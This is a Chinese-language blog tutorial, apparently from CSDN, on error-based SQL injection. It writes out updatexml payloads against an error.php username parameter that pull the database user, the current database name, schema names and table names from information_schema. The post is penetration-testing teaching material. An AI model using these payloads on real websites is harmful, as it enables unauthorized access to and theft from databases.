SQL注入基础 报错注入(三)

最新推荐文章于 2023-07-27 13:19:01 发布
最新推荐文章于 2023-07-27 13:19:01 发布
阅读量140 收藏
点赞数
分类专栏: SQL篇 文章标签: sql 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hunter_76/article/details/120115894
版权

数据库报错

当访问链接/error.php?username=1,页面是正常的,如果多了一个单引号而报错,/error.php?username=1',输出的界面如下图所示:

 updatexml获取user()

报错注入有多种格式,这里使用updatexml。

/error.php?username=1' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+

 updatexml获取database()

/error.php?username=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

updatexml获取数据库名和表名

数据库中可能含有其它的库,可以用语句获取其它库的信息。因为报错注入只显示一条结果,所以使用limit语句。

/error.php?username=1' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e),1)--+

database()获取当前数据库的库名sql,而test是从上面语句获得的第二个数据库的库名。

构造语句获取数据库test的表名。

/error.php?username=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='test' limit 0,1),0x7e),1)--+

hunter_76
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
32-32.渗透测试SQL注入基于报错注入(上)
05-10
32-32.渗透测试SQL注入基于报错注入(上)
java 报错 文件提前结束问题(Premature end of file)
weixin_43796595的博客
02-22 5362
文件提前结束问题(Premature end of file)
sql注入实战—报错注入
qq_40909772的博客
07-16 774
测试网站:自建靶场 http://192.168.57.128:1237/sql/error.php?username=1 测试工具:Burp Suite 1.首先访问http://192.168.57.128:1237/sql/error.php?username=1’,因为参数username的值是1’,在数据库中执行SQL时,会因为多了一个单引号而报错,输出结果如下所示:   通过页面返回的结果可以看出,程序直接将错误信息输出到了页面上,所以此处可以利用报错注入来获取数据。 2.报错注入有多种格式,此
关于SQL报错注入数据输出显示不完全的问题
m0_63138919的博客
07-27 1077
本文是对于sql报错注入 数据结果显示不全问题的解决方案 欢迎大家进行补充
SQL注入简介和注入方法教学
HAKUNAMATATATTA的博客
11-14 5022
sqli-labs靶场为例,详细介绍GET显错注入,GET盲注等一系列最新常见得SQL注入方法
报错注入显示不全问题
矜庄寂寥的博客
12-18 3898
目录介绍实验环境解决方法0x010x02 方法一(利用limit子句)0x02 方法二(使用mid函数)0x03 方法sqlmap O(∩_∩)O) 介绍 在sql主任中使用 updatexml extractvalue exp floor函数进行报错注入时,有时会出现由于数据的数量过多导致无法一次性显示所有内容,所以鄙人就去寻找了几种解决方法 实验环境 本次实验使用的是github上开源的sqli-labs训练靶场 地址:https://github.com/Audi-1/sqli-labs 解决
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
SQL注入基础和进阶.pdf
12-26
"SQL注入基础和进阶" SQL注入是指Web应用程序对用户输入的数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,那么攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作。开发...
33-33.渗透测试渗透测试SQL注入基于报错注入(下)
最新发布
05-10
渗透测试渗透测试SQL注入基于报错注入(下)
MrWQ#vulnerability-paper#SQL 注入基础 (报错注入及延时注入)1
07-25
1、判断是否存在报错 2、group by 虚拟表主键重复冲突 3、extractvalue() 函数 4、updatexml() 函数 1、判断字符注入 2、
SQL注入(一)联合查询 报错注入
m0_63306943的博客
04-21 1783
是web网站的常见攻击技术,如果权限足够的话它可以通过sql注入的方式1.知道物理路径可以进行木马的上传2.可以进行udf的提权3.可以通过注入获取到数据库中的数据。sql注入产生的原因:在数据交互中,前端的数据传入到后台处理时,由于后端没有做严格的判断,导致其传入的“数据拼接到SQL语句中后,被当作SQL语句的一部分执行。
SQL 注入漏洞(七)报错注入
不秃头的程序Yang
06-12 1032
一、代码分析 二、报错注入攻击 1、获取库名
org.apache.http.ConnectionClosedException: Premature end of 异常原因
zqz_zqz的博客
11-29 1万+
org.apache.http.ConnectionClosedException: Premature end of Content-Length delimited message body (expected: 121; received: 0) at org.apache.http.impl.io.ContentLengthInputStream.read(Content...
Premature end of script headers 的原因
weixin_34357267的博客
03-18 166
@import url(http://www.cnblogs.com/Load.ashx?type=style&file=SyntaxHighlighter.css);@import url(/css/cuteeditor.css); @import url(http://www.cnblogs.com/Load.ashx?type=style&file=SyntaxHighlighter.cs...
Java报错解决:org.apache.http.ConnectionClosedException: Premature end of chunk coded message body: closi
热门推荐
个人博客
05-26 1万+
再跑爬虫程序的时候突然遇到了如下报错: org.apache.http.ConnectionClosedException: Premature end of chunk coded message body: closing chunk expected... at org.apache.http.impl.io.ChunkedInputStream.getChunkSize(C...
sql注入updatexml报错注入
06-08
SQL注入是一种常见的安全漏洞,其中updatexml是一种常用的注入方式之一。如果你在使用updatexml时遇到了报错,可能是由于以下原因: 1. SQL语句中的updatexml函数使用不正确,参数数量或类型不匹配,导致SQL语句...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值